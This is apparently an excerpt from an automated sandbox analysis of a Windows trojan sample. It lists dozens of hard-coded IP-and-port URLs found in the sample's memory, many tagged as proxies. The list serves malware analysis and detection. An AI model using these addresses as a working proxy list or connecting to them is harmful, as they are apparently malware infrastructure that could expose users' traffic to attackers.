                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.56.65:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.56.65:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.77.241:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.77.241:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.102.111:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.102.111:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.142.35:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.142.35:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.155.74:3126
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.155.74:3126://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.245.81:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.245.81:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.35.49:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.35.49:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.48.45:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.48.45:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.133.137:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.133.137:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8FEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.140.158:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.140.158:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.192.154:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.192.154:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.222.132:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.222.132:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.139.26.54:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.139.26.54:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.43:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.43:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.18.73.60:5566
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.18.73.60:5566://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.182.79.112:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.182.79.112:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF23000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.135.60:18472
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.135.60:18472://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC019000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.141.160:12297
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.141.160:12297://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.143.172:47016
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.143.172:47016://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.144.55:9050
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.144.55:9050://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C775A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:12582
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C775D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:12582://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:64052
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:64052://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:13574
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:13574://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:18936
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:18936://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FBD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:29380
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:29380://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:3139
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:3139://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:37920
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:37920://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:49507
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:49507://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:49507x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:52593
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:52593://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.88.32:8001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.88.32:8001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.91.192:11721
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.91.192:11721://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C952C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.91.192:17605
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C952C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.91.192:17605://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.91.192:21981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.91.192:21981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.91.192:27898
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.91.192:27898://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.193.227.108:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.193.227.108:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7949000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.194.22.116:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C795B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.194.22.116:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.207.45.15:48678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.207.45.15:48678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.221.197.165
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.221.197.165://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.221.197.165:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.228.65.107:51032
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.228.65.107:51032://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.230.154.57:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.230.154.57:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.233.102.111:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.233.102.111:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.235.24.194:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.235.24.194:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.252.13.248:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.252.13.248:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.86.206:47464
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.86.206:47464://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.27.6.46
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.27.6.46://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.27.6.46:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.15.125:6888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.15.125:6888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:52611
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:52611://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.46.241.247
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.46.241.247://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C667B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.46.241.247:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.48.120.146:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.48.120.146:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.52.13.164:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.52.13.164:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.58.58.206://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.58.58.206:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.58.58.206x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.59.213.49:43840
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.59.213.49:43840://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.97.201.252
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.97.201.252://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.97.201.252:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDA5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.99.224.225:7497
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.99.224.225:7497://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C835E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.99.254.217:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.99.254.217:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.179.195:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.179.195:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.250.5:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.250.5:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.107:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.107:9090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.115:11537
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.115:11537://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.137:47421
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.137:47421://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.186:174
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.186:174://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.95:46656
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.95:46656://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.236:2093
